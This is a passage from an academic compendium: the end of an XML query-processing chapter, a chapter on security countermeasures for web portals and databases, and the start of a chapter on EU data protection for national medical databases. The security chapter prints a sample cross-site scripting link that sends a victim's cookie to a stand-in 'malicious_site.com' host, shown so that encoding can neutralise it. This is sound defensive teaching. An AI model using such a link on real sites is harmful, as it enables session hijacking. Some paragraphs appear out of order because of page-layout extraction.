Che, D. Accomplishing deterministic XML query optimization. Journal of Computer Science and Technology, 20(3), 357-366.
Frasincar, F., Houben, G. J., & Pau, C. (2002). XAL: An algebra for XML query optimization. In Proceedings of the 13th Australasian Database Conference, (ADC2002) (pp. 49-56).
Che, D. Efficiently processing XML queries with support for negated containments. International Journal of Computer & Information Science, 6(2), 119-120.
Gottlob, G., Koch, C., & Pichler, R. (2002). Efficient algorithms for processing XPath queries. In Proceedings of VLDB Conference (pp. 95-106), Hong Kong, China, 2002.
Che, D. Implementation issues of a deterministic transformation system for structured document query optimization. In Proceedings of the 7th International Database Engineering and Applications Symposium (pp. 268-277), Hong Kong, July 16-18, 2003.
Graefe, G., & DeWitt, D. (1987). The EXODUS optimizer generator. In Proceedings of ACM SIGMOD International Conference on Management of Data (pp. 160-172), May 1987.
Che, D., Aberer, K., & Özsu, M. T. (2006). Query optimization in XML structured-document databases. The VLDB Journal, 15(3), 263-289. Chien, S. Y., Vagena, Z., Zhang, D., Tsotras, V. J., & Zaniolo, C. (2002). Efficient structural joins on indexed XML documents. In Proceedings of VLDB Conference (pp. 263-274), Hong Kong, August 20-23, 2002. Chung, T. S., & Kim, H. J. (2002). XML query processing using document type definitions. Journal of Systems and Software, 64(3), 195-205. Clark, J., & DeRose, S. (1999). XML path language (XPath) Version 1.0. Retrieved from http://www. w3.org/TR/1999/REC-xpath-19991116
Grust, T. (2002). Accelerating XPath location steps. In Proceedings of ACM SIGMOD Conference (pp. 109-120), 2002. Guha, S., Jagadish, H. V., Koudas, N., Srivastava, D., & Yu, T. (2002). Approximate XML joins. In Proceedings of the ACM SIGMOD Conference (pp. 287-298), 2002. Jagadish, H. V., Lakshmanan, L. V. S., Srivastava, D., & Thompson, K. (2001). TAX: A tree algebra for XML. In Proceedings of DBPL Conference (pp. 149-164), Rome, Italy, 2001. Li, Q., & Moon, B. (2001). Indexing and querying XML data for regular path expressions. In Proceedings of VLDB Conference (pp. 361-370), Rome, Italy, September 2001. McHugh, J., & Widom, J. (1999). Query optimization for XML. In Proceedings of VLDB
2077
A Deterministic Approach to XML Query Processing
Conference (pp. 315-326), Edinburgh, Scotland, September 1999. McHugh, J., Abiteboul, S., Goldman, R., Quass, D., & Widom, J. (1997). Lore: A database management system for semistructured data. ACM SIGMOD Record, 26(3), 54-66. Milo, T., & Suciu, D. (1999). Index structures for path expressions. In Proceedings of ICDT (pp. 277-295). Salminen, A., & Tompa, F. W. (1994). PAT expressions: An algebra for text search. Acta Linguistica Hungarica, 41(1), 277-306. Schmidt, A. R., Waas, F., Kersten, M. L., Carey, M. J., Manolescu, I., & Busse, R. (2002). XMark: A benchmark for XML data management. In Proceedings of VLDB (pp. 974-985), Hong Kong, China, August 2002.
Selinger, P. G., Astrahan, M. M., Chamberlin, D., Lorie, R., & Price, T. (1979). Access path selection in a relational database management system. In Proceedings of ACM SIGMOD Conference (pp. 23-34), 1979. Srivastava, D., Al-Khalifa, S., Jagadish, H. V., Koudas, N., Patel, J. M., & Wu, Y. (2002). Structural joins: A primitive for efficient XML query pattern matching. In Proceedings of ICDE Conference (pp. 141-152), San Jose, CA, February 26-March 1, 2002. Wang, G., & Liu, M. (2003). Query processing and optimization for regular path expressions. In Proceedings of CAiSE Conference (pp. 30-45), Klagenfurt, Austria, June16-18, 2003. Zhang, C., Naughton, J. F., DeWitt, D. J., Luo, Q., & Lohman, G. M. (2001). On supporting containment queries in relational database management systems. In Proceedings of ACM SIGMOD Conference (pp. 425-436), Santa Barbara, CA, USA, 2001.
This work was previously published in International Journal of Information Technology and Web Engineering, Vol. 1, Issue 4, edited by G. Alkhatib and Dr. Rine, pp. 49-67, copyright 2006 by IGI Publishing (an imprint of IGI Global).
2078
2079
Chapter 7.5
Countermeasures for Protecting Legally Sensitive Web-Powered Databases and Web Portals Theodoros Evdoridis University of the Aegean, Greece Theodoros Tzouramanis University of the Aegean, Greece
INTRODUCTION The issue of the escalation of security breaches in the field of Web systems has caused a great deal of disquiet in the computer security community. The majority of recorded security violations against legally sensitive portals have raised numerous issues both at an individual and at an organizational level. Furthermore, taking for granted the fact that security achieved through the isolation of the targeted systems is a path which no one is willing to follow, it is understood that security countermeasures must be perceived and applied without any alterations in respect of the current operational scheme. The economic and social reasons for using the Internet are still far too compelling (Schneier, 2005). Looking in this direction, the complexity as well as the urgency of the present situation has attracted specialists from
other scientific sectors, such as psychology and law, who contribute to the search for an integrated multilevel solution required in this context.
BACKGROUND The issue of making computers that host legally sensitive information secure has been a major concern of the computer security community over the years (Computerworld.com, 2003). A group of experts argue that security features should not be built into the Web portal’s or into the Web database’s infrastructure, but rather added on to it, according to emerging needs, because doing so would increase dramatically the system’s complexity, rendering it cumbersome to debug, to maintain, and to further develop. Another view is held that claims a mixed solution must be ad-
Countermeasures for Protecting Legally Sensitive Web-Powered Databases and Web Portals
opted. As routine tasks like access control must be handled in the database and because new threats emerge daily, add-on security solutions should be applied when it is considered necessary.
MAIN THRUST It is obvious that in view of blocking any possible attack (see other sections, for example, on the “Security Threats in Web-Powered Databases and Web Portals,” which also appears in this publication), a corresponding multilevel countermeasure policy must be followed. Below, the most common security countermeasures for these types of attacks are reviewed.
Network-Level Countermeasures Looking forward to preventing all possible attacks performed on the network layer of a legally sensitive Web portal, security mechanisms must be implemented (Microsoft Corporation, 2003). Primary solutions for these type of attacks are cryptographic protocols, such as SSL or TLS, that undertake the task of encrypting communication data from the client to the server, and vice versa.
The usage of these protocols guarantees that the data are revealed only to authorized parties, thus ensuring information confidentiality. Furthermore, by adopting Ipsec, which is an obligatory part of Ipv6 (Wikipedia, 2006), additional security mechanisms that ensure authentication, data confidentiality, and message integrity between communicating parties are interpolated in the security scheme. As a result, sniffing attacks, while successful in capturing the data, fail in reaching their goal, as the captured data are in a encrypted form that cannot be used alone to produce their decrypted version. As for tampering, message authentication codes included in Ipsec can be used to discover if the received message is really the original one sent the legitimate sender (Tipton & Krause, 2004). In addition, the message authentication code included in the above cryptographic protocols by using parameters that are related with current time, assures that no prior connection can be used to forge a new one, thus preventing any session high-jacking attempt. Finally, to successfully counter the spoofing threat, access control mechanisms are needed such as firewalls, both network and application ones, that have appropriately been configured. The first category, known as packet filtering routers, is responsible
Figure 1. A firewall protected Local Area Network containing the Web portal assets
Local Area Network
Internet Packet Filtering Router Web Server
Application Level Gateway
2080
Database Server
Countermeasures for Protecting Legally Sensitive Web-Powered Databases and Web Portals
for reading packet headers and deciding, according to a given access control list that expresses the security policy that needs to be enforced, if the packet should be forwarded or blocked. One of the most commonly encountered application level firewalls is application-level gateways. These systems serve as proxy servers and act as a relay for application level traffic.
Host-Level Countermeasures For defence against these kind of threats, all core components of the Web portal must be running the latest stable versions, including service packs, security updates, and patches that fix bugs or render the program, of all software components that they utilise, more reliable. Additionally, specialised virus detection software should be active at all times, looking for the presence of already known viruses on the hosts and the network. Apart from this, all default accounts on operating systems and servers should be deactivated and all external connections to the intranet where the Web portal’s hosts lies must be forced to pass through network and application level firewalls (Oppliger, 2002). Proxy server usage is also recommended because this network service forces all connections and requests to be made against a third computer system that, in turn, performs requests on behalf of the client to the default server. This schema adds another security layer because information, such as ip addresses of the hosts, are hidden from the client, and direct access to the hosts is prevented. In conclusion, intrusion detection systems must be adopted in order to detect all types of malicious network traffic and computer usage that can’t be detected by a conventional firewall (Wikipedia. org, 2006).
Application-Level Countermeasures To be able to counter attacks performed against the application software, developers must pay heed when designing the interfaces that are go-
ing to be used for user-submitted data (Microsoft Corporation, 2003; Splain, 2002). To prevent the buffer overflow threat from coming to pass, data validation regarding its size must take place. To be able to prevent SQL injection attacks at an application level, the routines for constructing dynamic SQL statements must be modified to exclude special characters such as “;” and the application should connect to the database with least-required privileges (Breidenbach, 2002; Su & Wassermann, 2006). Besides, when HTML forms are disposed for authentication, data including usernames, password, and cookie should be transmitted via SSL in encrypted form as a single entity. This technique prevents credential disclosure and cookie replay attacks, because the attacker would not be able to sniff the cookie out, as all traffic is encrypted. Likewise, client software and operating systems need to be up to date to avoid any vital information leakage on this side. Moreover, software developers should embed password evaluation routines on the application, forcing users to use passwords that comply with minimum-security standards. Finally, in order to protect against cross-site scripting attacks, site owners must never trust user input and always filter metacharacters. This will eliminate the majority of XSS attacks. Converting “” and other possibly malicious characters to their HTML equivalents is also suggested when it comes to script output (Cgisecurity.com, 2003). Figure 2 depicts a malicious link specially crafted to take advantage of the problematic site “subject_to_xss_site.com” and gain access to the victim’s cookie. When employing character conversion on specific characters, the once malicious link is no longer a threat because it can’t be correctly parsed to produce the expected results for the attacker. In any circumstances, XSS security holes can be damaging and costly to a business if abused. Often, attackers will disclose these holes to the public, which can erode customer and public confidence
2081
Countermeasures for Protecting Legally Sensitive Web-Powered Databases and Web Portals
Figure 2. A malicious link http://subject_to_xss_site.com?name=News&file=article&sid=1&optionbox= [‘http://malicious_site.com/steal.cgi?’+document.cookie]
Figure 3. A malicious link turned into a harmless one using special characters conversion http://subject_to_xss_site.com%3Fname%3DNews%26file%3Darticle%26sid%3D1%26optionbox%3D %5B%27http%3A//malicious_site.com/steal.cgi%3F%27%2Bdocument.cookie%5D
in the security and privacy of the organisation’s site (Securitydocs, 2005). On the other hand, at an individual level, the most effective way of protecting against this type of attack is to instruct the authorized users to follow links from the main Web site they are viewing only. If a user visits a site that links to the BBC, for instance, instead of clicking on it, it would be wiser to visit the BCC’s main site and use its search engine to access the desired content. This will probably eliminate 90% of the problem. However, sometimes XSS can be executed automatically when a user opens an email, an e-mail attachment, or reads a guestbook or bulletin board post. If this is the case, and the sender or the poster of the item that is about to be processed is unknown, users should be very careful. One of the best ways to guard oneself against this scenario is to deactivate JavaScript or VBscript in the browser settings.
Physical and Insider Countermeasures Protecting the facility and its assets from unauthorized access, both forced or covered, is an
2082
important part of any security system (WBDG. org, 2005). Some measures to consider include compound or facility access control, fences, guards, remote controlled gates, and forced-entry ballistic-resistant (FE-BR) doors and windows. Moreover, perimeter intrusion detection systems, as well as alarms and detection devices (motion, acoustic, infrared), must be included in the security scheme. Finally, physical access to areas of the facility should be electronically supported using fingerprints, biometrics, and smart cards, leaving digital trails on appropriate log files when an a successful or unsuccessful attempt to enter the area takes place. With respect to insider attacks, successful countermeasures include implementation and application of personnel reliability programs (Tipton & Krause, 2004) and performing background checks upon recruiting. Additionally, the appropriate management of employees, combined with adoption of a well-placed code of ethics with significant impact upon disregarding it, may keep employees satisfied or cautious enough about considering any malicious actions. Moreover, personnel access should be controlled and granted
Countermeasures for Protecting Legally Sensitive Web-Powered Databases and Web Portals
Figure 4. A smart card used for health insurance in France
but evaporate because the corresponding security vulnerabilities will no longer exist.
CONCLUSION
to areas of the facility that are part of their duties, and activity must be monitored by specialized surveillance systems.
Aiming at successfully preventing and successfully dealing with the threats that compromise a legally sensitive Web portal’s operation is without doubt a nontrivial task. Information systems security experts, alongside Web portal specialists and experts from other scientific fields, ought to cooperate and provide adaptable, adjustable, and appropriate countermeasures that can efficiently respond to the eventuality of any potential challenge. The latter must be achieved in order to ensure that legally sensitive Web-powered databases and Web portals will flourish, prosper, and drift along in their progress track.
FUTURE TRENDS More attacks against financial institutions are expected in the future, as criminals look for new ways to commit fraud. We also expect to see more insider attacks with a criminal profit motive. Already, most of the targeted attacks—as opposed to attacks of opportunity—originate from inside the attacked organization’s network. Additionally, more politically motivated hacking attempts are expected, whether against countries, companies in “political” industries (petrochemicals, pharmaceuticals, etc.), or political organizations (Schneier, 2005). It is to be noted that another group of experts holds a different opinion. According to their beliefs, in the years to come, program vulnerabilities will be in decline and so will security breaches. It is believed that applications will become smaller and simpler because they will rely on rock solid quality software components that will be used by all programs. Web applications and Web portals will also benefit from this philosophy, and as a result, a not negligible amount of threats will all
REFERENCES Breidenbach, B. (2002). Guarding your Web site against SQL injection attacks (E-book). Apress. Cgisecurity.com. (2003). Cross site scripting questions and answers. Retrieved January 8, 2007, from http://www.cgisecurity.com/articles/ xss-faq.shtml Computerworld.com. (2003). The future of security. Retrieved January 8, 2007, from http://www.computerworld.com/printthis/2003/0,4814,88646,00. html Microsoft Corporation. (2003). Improving Web application security: Threats and countermeasures. Microsoft Press. Oppliger, R. (2002). Security technologies for the World Wide Web (2nd ed.). Artech House. Schneier, B. (2005). Attack trends 2004-2005. Retrieved January 8, 2007, from http://www.
2083
Countermeasures for Protecting Legally Sensitive Web-Powered Databases and Web Portals
uniquely identify the user across multiple sessions.
Securitydocs. (2005). Cross site scripting (XSS) FAQ. Retrieved January 8, 2007, from http://www. securitydocs.com/library/3472
Database: An organized collection of data (records) that are stored in a computer in a systematic way, so that a computer program can consult it to answer questions. The database model in most common use today is the relational model, which represents all information in the form of multiple related tables, with each one consisting of rows and columns.sa
Splain, S. (2002). Testing Web security assessing the security of Web sites and applications. John Wiley. Su, Z., & Wassermann, G. (2006). The essence of command injection attacks in Web applications. In Proceedings of the 33rd Annual Symposium on Principles of Programming Languages (POPL’06). Tipton, H. F., & Krause, M. (2004). Information security management handbook (5th ed.). CRC Press. WBDG.org. (2005). Provide security for building occupants and assets. Retrieved January 8, 2007, form http://www.wbdg.org/design/provide_security.php
Database Server: A computer program that provides database services to other computer programs or computers, as defined by the client-server model. The term may also refer to a computer dedicated to running such a program. Firewall: A piece of hardware or software which functions in a networked environment to prevent the escape of communication forbidden by the security policy.
Wikipedia.org. (2006). Retrieved January 8, 2007, from http://en.wikipedia.org /wiki/Main_Page
IP Security (IPsec): A standard for securing Internet Protocol (IP) communications by encrypting or authenticating all IP packets. IPsec provides security at the network layer.
KEY TERMS
Secure Sockets Layer (SSL): A cryptographic protocol which provides secure communications on the Internet.
Code of Ethics: A formal statement of the company’s values on ethics and social issues. Some set out general principles about the company’s beliefs on matters such as quality, employees, or the environment. Others set out the procedures to be used in specific ethical situations, such as conflicts of interest or the acceptance of gifts. Cookie: A small packet of information stored on users’ computers by Web sites in order to
Transport Layer Security (TLS): An SSL’s successor. Although there are slight differences between SSL 3.0 and TLS 1.0, the protocols are substantially the same. Web Server: A computer program hosted in a computer that is responsible for accepting HTTP requests from clients, which are known as Web browsers, and serving them Web pages, which are usually HTML documents.
This work was previously published in Encyclopedia of Portal Technologies and Applications, edited by A. Tatnall, pp. 188-191, copyright 2007 by Information Science Reference, formerly known as Idea Group Reference (an imprint of IGI Global).
2084
2085
Chapter 7.6
Compiling Medical Data into National Medical Databases:
Legitimate Practice or Data Protection Concern? Boštjan Berčič Institute for Economics, Law and Informatics, Ljubljana, Slovenia Carlisle George Middlesex University, UK
ABSTRACT In recent years, various national medical databases have been set up in the EU from disparate local databases and file systems. Medical records contain personal data and are as such protected by EU and member states’ legislation. Medical data, in addition to being personal data, is also defined in the EU legislation as being especially sensitive and warrants special measures to protect it. It therefore follows that various legal issues and concerns arise in connection with these processes. Such issues relate to the merits of compiling a nationwide database, deciding on who has access to such a database, legitimate uses of medical data held, protection of medical data, and subject access rights amongst others.
This chapter examines some of these issues and argues that such databases are inevitable due to technological change; however there are major legal and information security caveats that have to be addressed. Many of these caveats have not yet been resolved satisfactorily, hence making medical databases that already exist problematic.
INTRODUCTION Medical data consists of information used in the provision of healthcare such as observations of patients (e.g., test results), medical histories, symptoms, prescriptions, and treatments. It is essential that such data are properly recorded and accessible in order to support the care of
Compiling Medical Data into National Medical Databases
patients. Specifically, medical data can be used for various purposes such as to: create a historical record of a patient, provide a reference for future treatment, provide a communication mechanism among different medical professionals, anticipate future health problems, provide a legal record, and support clinical research (Shortliffe & Barnett, 2001). The use of information technology in healthcare has created new possibilities including the digitisation of medical data (from passive paperbased patient records). An important consequence of this is the creation of the electronic health record (EHR), which can be defined as: a longitudinal electronic record of patient health information generated by one or more encounters in any care delivery setting. Included in this information are patient demographics, progress notes, problems, medications, vital signs, past medical history, immunizations, laboratory data and radiology reports. (Healthcare Information and Management Systems Society, 2007) EHRs are generally stored in a database system and their contents can vary according to the specific national legal framework under which they are regulated. They provide many advantages over traditional paper-based patient records leading to an improved quality of healthcare (by facilitating new methods of delivering healthcare and better data management). Some benefits of EHRs include: non-exclusive, continuous and multiple access to a patient’s data; improved accuracy, reliability and integrity of data; standardised data record formats; ease of data access; ease of data integration; and stronger protections for confidentiality and security (Hunter, 2002). Traditionally, EHRs have been stored in database systems that were locally developed, maintained and stored by organisations (such as hospitals, doctors’ surgeries and other healthcare providers) in order to improve their quality
2086
of service. The advent of new information and communication technologies, improved networks and the need for new data processing capabilities (e.g., demographic healthcare studies) have resulted in the creation of (or attempt to create) national medical databases. For example in June 2002, the United Kingdom (UK) Government (Department of Health) published a National Strategic Programme for the use of information technology in the National Health Service (NHS). Amongst key elements outlined in the strategy was the delivery of core national services that can be used throughout the NHS such as an electronic health record service (having core data and reference links to local medical databases) accessible nationally for out of hours reference, (Department of Health, 2002). A national medical database can be described as the aggregation of various disparate local medical registries/databases compiled at the national level. Such databases are characterised by their extensive coverage/storage of medical data, both in terms of their content (they integrate different medical databases) and geographic coverage (they integrate data from an entire country). They can lead to improved healthcare services coordinated (and planned) at a national level. Improvements are due to factors such as: the provision of medical information (e.g., for an emergency) anytime and anywhere, nationally standardised medical records generally leading to an improved quality of medical data, access to a large volume of medical data for clinical research, the ability to undergo epidemiology research, the central control of medical data, the ability to plan services for populations, and better management of scarce national medical resources (see Department of Health, 2003). The nature of national medical databases (compared to local databases), especially the fact that they are accessible nationally raises greater legal concerns regarding the protection (and potential unauthorised disclosure and use) of medical data. This is especially poignant for
Compiling Medical Data into National Medical Databases
national medical databases created and maintained by non-governmental organisations (e.g., private medical companies). In the UK, in order to address predicted future healthcare trends, a national medical database appears to be a necessity. In 2006 a royal society report on digital healthcare (Royal Society, 2006) identified various predicted changes (driven and enabled by technology) in the UK healthcare system in 10-15 years. These predicted changes included: an increase in patient-focused service giving patients more choice in how, where and when treatment is received; a change from hospital care to more primary and community care resulting in advantages such as decrease risk of infections in a large institution; the integration of healthcare with other services (e.g., social care) resulting in a multi-organisational service; and an increase in the number of healthcare service providers, including from the private sector. These changes will require the need for patients’ medical data to be accessed anywhere, anytime and ‘ondemand’. Further, medical data will need to be shared amongst healthcare workers both within and across (public and private sector) organisations. Such developments will essentially require a national medical database in order to coordinate and integrate medical information from various sources. This chapter focuses on the phenomenon of national medical databases and some data protection concerns (including related legal issues of privacy and confidentiality) that arise from the creation and the operation of such databases. The chapter first briefly discusses examples of national medical databases in two European Union member states namely the United Kingdom (UK) and Slovenia. It then discusses aspects of the European Union (EU) Data Protection Directive 95/46/EC (the basis of EU Member States’ data protection legislation) such as what constitutes personal data, data protection principles, obligations of data controllers, and rights of data subjects. Next,
some legal concerns specific to national medical database are discussed with a view to suggesting possible solutions for addressing these concerns. The chapter finally concludes by looking at the balance between the benefits and risks associated with national medical databases.
THE CASES OF THE UK AND SLOVENIA In the UK, under the 2002 National Strategic Programme for the use of information technology in the National Health Service (NHS), a national medical database is being set up (at the time of writing) that will store the information (medical records) of up to 50 million patients in England. These records will include demographic information (e.g., date of birth, name and address) and medical data (e.g., NHS number, allergies, adverse drug reactions, test results, medication, past or continuing treatment details), (NHS Factsheet, 2005). There is the potential in the future to include other categories of medical data such as genetic data, psychiatric records, and others. Implementation of this system began in 2007 through an “early adopter” programme involving general practitioner practices in four primary care trusts. “Early adopters” are required to create summary care records (SCR), which will form part of the care records service (national medical database) in England. The SCR is formed by the uploading of a patient’s current medication, known allergies, and adverse reactions into a database. There has been much debate over issues such as who will have access to such records, how will the privacy of patients be preserved, and how will the system be protected amongst others. Further there has been speculation about whether the designed system is fully compatible with internationally binding agreements (e.g., Council of Europe recommendation no R(97)5 on the protection of medical data, to which Britain is a signatory or the
2087
Compiling Medical Data into National Medical Databases
Declaration of Helsinki on ethical principles for medical research, Anderson, 2007). However, the UK Department of Health has proposed various practices for the implementation and operation of this new national healthcare system. These practices (discussed further on) have been approved by the UK Information Commissioner (who oversees the implementation of the Data Protection Act 1998) as being consistent with the requirements of the (Data Protection) Act (Information Commissioner’s Office, 2007). In Slovenia, around 50 different medical databases are interconnectable on the national level by reference to some unique identifier (mainly national identification number (NINo), but also social security number and healthcare card number) and held by a few governmental agencies (mainly by the national Institute for the Preservation of Health). The collection and processing of these data is regulated by the 2000 Healthcare Databases Act. At present, no single physically integrated (compiled) national medical database exists, but a variety of medical data on individuals is obtainable if data in the various databases (within departments and agencies) are combined/collated. If a physically integrated national medical database existed compiled data may be easily available to non-clinical personnel such as clerks, which raises concern. Most data compiled at the national level (from various databases) are in the identifiable/personal form, with some data anonymised (for example drug users, HIV positives, etc.). Data are collected mainly for research and statistical purposes, which would in theory allow anonymisation, however, some databases are used for other purposes and have to be in identifiable/personal form. A database of contractable diseases, for example (vaccinations, rabies), is used in the prevention of epidemics and pandemics and is usually retained in an identifiable/personal form in other to allow linking (with other databases). Two major data protection concerns are whether it would be better to have all data in an anonymised form (since such data is
2088
used mainly for statistics which only cares about aggregates) and how best to prevent misuse of data by unscrupulous employees who can sometimes easily link data from various databases with reference to the same unique identifier.
PERSONAL DATA AND DATA PROTECTION LEGISLATION Directive 95/46/EC of the European Parliament and of the Council of 24 October 1995 (thereafter referred to as the Directive) sets out the legislative framework (variously implemented in the national legislation of EU member states e.g., the UK Data Protection Act 1998 and Slovenian Personal Data Protection Act 1999) for the protection of individuals with regard to the processing of personal data and on the free movement of such data. Article 2 of the Directive defines “personal data” as “any information relating to an identified or identifiable natural person (‘data subject’) where an identifiable person is one who can be identified, directly or indirectly, in particular by reference to an identification number or to one or more factors specific to his physical, physiological, mental, economic, cultural or social identity.” The means of identifying should not cause excessive costs, effort and should not take much time. The given definition of personal data is very broad, so that when used, almost any information can qualify as personal data (the criteria are met if it applies to an identifiable individual, for example: the mere fact that an individual is wearing a blue shirt can constitute an item of personal data). On the other hand, this definition is semantically also rather vague. Even if we accept the fact that content-wise every item of information can be considered personal data provided it can be related to an individual, the directive’s definition is still rather vague structurally (since it is not always clear what kind of internal structure every data record has to have to be considered personal data). In relational database theory, for
Compiling Medical Data into National Medical Databases
example, a record structurally consists of two parts: (1) a unique identifier (primary key) of the record viz. entity under consideration and (2) one or several items of data related to it. The directive’s definition does not define personal data in this way, hence it is not always clear, for example, whether a unique identifier of a person (such as national identification number referred to as NINo) already constitutes personal data, whether only items of data related to this unique identifier would be considered personal data (for example the fact that someone lives on Oxford Street) or whether only a record that meets both criteria, inclusion of the unique identifier and data related to it would be considered personal data (for example the NINo of a person plus the fact that this person lives on Oxford Street). In the UK case of Durant v Financial Services Authority (2003 EWCA Civ 1746), the Court of Appeal issued a landmark ruling narrowing the interpretation of what makes data ‘personal’ (within the meaning of personal data under the EU directive and UK Data Protection Act 1998). The Court ruled that personal data is information which: is biographical in a significant sense; has to have the individual as its focus; and has to affect an individual’s privacy whether in his personal family life, business or professional activity. At the time of writing, this case is currently being appealed before the European Court of Human Rights citing a breach of Article Eight of the European Convention of Human Rights (i.e., the right to privacy). The question of what constitutes personal data is not as trivial as it seems, since the Directive only applies to personal data, which is recorded as part of a filing system (Article 3(1)). Hence another very important question is the question of what constitutes a personal data filing system (which, following the directive’s definition, is: “any structured set of personal data which are
accessible according to specific criteria, whether centralized, decentralized or dispersed on a functional or geographical basis.”), and on this, cascading, another very important question, that of what constitutes processing of personal data (which, following the Directive’s definition, is: any operation or set of operations which is performed upon personal data, whether or not by automatic means, such as collection, recording, organization, storage, adaptation or alteration, retrieval, consultation, use, disclosure by transmission, dissemination or otherwise making available, alignment or combination, blocking, erasure or destruction. This structurally rather imprecise and all inclusive definition of personal data in the end determines whether the Directive can be applied for a particular case involving collected data. In the context of national medical databases, data stored within them will certainly constitute personal data and as such will fall under the legal framework of member states’ data protection legislation (implemented from the Directive), notwithstanding the differences in these implementations. In any data processing context, there exists a data controller and one or more data processors. The Directive defines a “data controller” as a “natural or legal person, public authority, agency or any other body which alone or jointly with others determines the purposes and means of the processing of personal data” and a “data processor” as “any other body which processes personal data on behalf of the controller.” Article 6(1) of the Directive states five general principles relating to data quality, namely that data must be: • •
•
Processed fairly and lawfully; Collected for specified, explicit and legitimate purposes and only processed for those purposes; Adequate, relevant and not excessive;
2089
Compiling Medical Data into National Medical Databases
• •
Accurate and kept up to date; Kept in a form which permits identification of data subjects for no longer than is necessary for the purposes for which the data were collected or for which they are further processed.
Article 25 of the Directive also outlines an important principle related to the transfer of data to third countries—namely that member states shall provide that the transfer to a third country of personal data which are undergoing processing or are intended for processing after transfer, may take place only if the third country in question ensures an adequate level of protection.
OBLIGATIONS OF DATA CONTROLLERS AND RIGHTS OF DATA SUBJECTS When is Processing Legitimate? According to Article 7 of the directive, personal data may be processed only if • •
• • •
•
2090
The data subject has unambiguously given his consent; or Processing is necessary for the performance of a contract to which the data subject is party; or Processing is necessary for compliance with a legal obligation; or Processing is necessary in order to protect the vital interests of the data subject; or Processing is necessary for the performance of a task carried out in the public interest; or Processing is necessary for the purposes of the legitimate interests pursued by the controller (or authorised third parties) subject to the rights of data subjects to (e.g., privacy) under Article1 (1).
The processing of personal data on the local level (e.g., primary care, hospitals etc.) usually falls (has to fall) within one of these categories. In Slovenia, the 2000 Healthcare Databases Act governs compilation of various medical databases on the national level. In the absence of such special law there might be other legal titles by reference to which data compilation could be legal, for example, a contract between an individual and a data controller (e.g., a hospital) which would allow the data controller to process personal data because it is necessary for the performance of a contract. However, a contract between the data subject and the data controller at the local level does not automatically empower local data controllers to transfer data to the national level (e.g., national medical database). Another legal title according to which such transfer would be deemed legal is for example the case of transferring data to a national Centre for Disease Control and Prevention (i.e., performance of a task carried out in the public interest). In the absence of other legal titles, data could be compiled at the national level on the basis of data subjects’ consent. A data controller of a national medical database could, for example, obtain such consents (e.g., in written form) by turning directly to subjects whose data it obtained from a local level or with the collection of data from the data subjects themselves. Different countries regulate this differently. In Slovenia for example, personal data in the public sector may be processed only if the processing of personal data is provided for by statute. If no such statute exists, the public sector is not allowed to extract consent from data subjects to collect categories of data, whose collection was not foreseen by the law. This particular provision seeks to ensure that state administration and organs would not impinge on the privacy of its citizens by ad hoc collection of various categories of data and compilation of databases not foreseen by the legislator. However, different statutes may provide that certain personal data may be processed by the administration on
Compiling Medical Data into National Medical Databases
the basis of the personal consent of the individual and in such cases, and only in such cases, can the state apparatus set about collecting data by consent. Other countries (such as the UK) do not have such provisions in their data protection legislation since the Directive does not specifically require it.
Medical Data as a Special Category of Data Medical data (along with data revealing racial or ethnic origin, political opinions, religious or philosophical beliefs, trade-union membership, and the processing of data concerning sex life, but interestingly not financial data) is especially sensitive according to the Directive. It is forbidden to process it, except where (Article 8): • •
•
•
The data subject has given his explicit consent, Processing is necessary for the purposes of carrying out the obligations and specific rights of the controller in the field of employment law, Processing is necessary to protect the vital interests of the data subject or of another person where the data subject is physically or legally incapable of giving his consent, The processing relates to data, which are manifestly made public by the data subject or is necessary for the establishment, exercise or defence of legal claims.
Information to be Given to Data Subject The directive demands that when collecting data from a data subject (Article 10), (or obtaining from another source, which is not the data subject Article (11)(1)) the controller must provide the data subject with at least the following information related to the processing of his or her data:
• • • • •
The identity of the controller, The purposes of the processing, The categories of data concerned, The recipients or categories of recipients, The existence of the right of access to and the right to rectify the data concerning him.
If a national medical database is compiled, data would probably not come directly from the data subjects themselves, but rather from the providers of primary health services such as clinics and hospitals (as is the case with “early adopters” in the UK) . Whenever such data is compiled on the national level, but no later than the time when the data are first disclosed to third parties, data subjects would have to be informed about it. The recipients of data would also have to be disclosed, which are not always obvious in advance and transfers to such recipients would always need to occur according to an explicit legal title. This provision is often violated in practice as various data collectors do not present all of the information necessary to data subjects. Hence, the identities of data controllers are often not disclosed (the data controller's data processor is often enlisted instead, for example, a hospital carrying out clinical research instead of the company on whose behalf the research is carried out); some recipients of the data are not disclosed (in the above case, the ultimate recipient could be the national medical database where the data would eventually resurface); and the purposes of processing are sometimes too vaguely defined (such a broad, all encompassing purpose would for example be processing for the purposes of national healthcare, which is void of specific meaning).
Right of Access According to the Directive, an individual whose data are being processed has the right (subject to some exceptions) to obtain from the controller (Article 12):
2091
Compiling Medical Data into National Medical Databases
•
•
•
•
Confirmation as to whether or not data relating to him are being processed and the recipients or categories of recipients to whom the data are disclosed, Communication to him of the data undergoing processing and of any available information as to their source, Appropriate rectification, erasure or blocking of data the processing of which does not comply with the provisions of this directive, Notification to third parties to whom the data have been disclosed of any rectification, erasure or blocking carried out unless this proves impossible or involves a disproportionate effort.
have to deny any transfer request. Once at the national level, each transfer from the compiled national medical database should also be recorded to enable post screening of transactions.
Right to Object Where processing is necessary for the performance of a task carried out in the public interest or for the purposes of the legitimate interests pursued by the controller (Article 7), a data subject has the right (under Article 15) to object (subject to compelling legitimate ground) to the processing of data related to him unless such processing is provided for by national legislation.
Automated Individual Decisions European member states have codified this article differently in their respective national legislation: some have prescribed a duty to notify data subjects of possible receivers of data relating to them, others go as far as prescribing compulsory recording of each data transfer for specified periods of time. In Slovenia, for example, every transfer of personal data to third parties (e.g., local authorities, police) has to be recorded and retained for some period of time (5 years) in case the subject exercises his right to obtain this information. This recording of transfers puts some burden on the data controller but there are signs that it effectively controls data paths and prevents the leaking of data. Each such transfer must be adducible from one of the titles cited in Article 7 of the Directive and this title must be sought prior to it and recorded alongside the receiver of data. Data controllers are less likely to pass on data if they must record such transfers and search for its justification in advance. In the case of creating a national medical database, local health service providers would have to check whether there is a legal instrument to authorise the transfer of such data to the national level (e.g., a statute mandating such transfer to a national medical database) and in the absence of such a legal instrument would
2092
Under Article 15 of the Directive, every person shall be granted the right not to be subject to a decision which produces legal effects concerning him or significantly affects him and which is based solely on automated processing of data. If data from a national medical database is used automatically, (e.g., if an insurance company makes an automated decision on an insurance claim, based on information accessed from a national medical database) then the rights of the data subject affected would have been violated.
